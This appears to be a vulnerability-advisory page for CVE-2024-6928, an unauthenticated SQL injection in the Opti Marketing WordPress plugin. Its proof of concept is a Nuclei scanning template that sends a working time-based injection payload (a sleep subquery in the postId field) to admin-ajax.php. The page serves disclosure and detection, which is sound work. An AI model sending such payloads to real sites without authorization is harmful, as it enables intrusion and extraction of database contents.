CVE-2024-6928: Opti Marketing <= 2.0.9 - SQL Injection

日期: 2025-08-01 | 影响软件: Opti Marketing | POC: 已公开

漏洞描述

The Opti Marketing plugin for WordPress is vulnerable to SQL Injection in all versions up to, and including, 2.0.9 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.

PoC代码[已公开]

id: CVE-2024-6928

info:
  name: Opti Marketing <= 2.0.9 - SQL Injection
  author: s4e-io
  severity: high
  description: |
    The Opti Marketing plugin for WordPress is vulnerable to SQL Injection in all versions up to, and including, 2.0.9 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.
  reference:
    - https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/opti-marketing/opti-marketing-209-unauthenticated-sql-injection
    - https://wpscan.com/vulnerability/7bb9474f-2b9d-4856-b36d-a43da3db0245/
    - https://nvd.nist.gov/vuln/detail/cve-2024-6928
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
    cvss-score: 10
    cve-id: CVE-2024-6928
    epss-score: 0.75526
    epss-percentile: 0.98857
  metadata:
    max-request: 2
    vendor: opti-marketing
    product: opti-marketing
    framework: wordpress
    publicwww-query: "/wp-content/plugins/opti-marketing"
  tags: time-based-sqli,cve,cve2024,wpscan,wp-plugin,wp,wordpress,opti-marketing,sqli

flow: http(1) && http(2)

http:
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'contains(body, "/wp-content/plugins/opti-marketing")'
        condition: and
        internal: true

  - raw:
      - |
        @timeout 20s
        POST /wp-admin/admin-ajax.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        action=save_article&postId=(select*from(select(sleep(6)))a)

    matchers:
      - type: dsl
        dsl:
          - 'duration>=6'
          - 'status_code == 200'
        condition: and
# digest: 4a0a0047304502200514a82650487d33b0b892983f6d8169e84dacd4c93730a000efc2d5ca82408e022100baf30eaac164a6a34c33eb70e6bbbbde4c0d9f67727c4251ac4136a2597a57a2:922c64590222798bb761d5b6d8e72950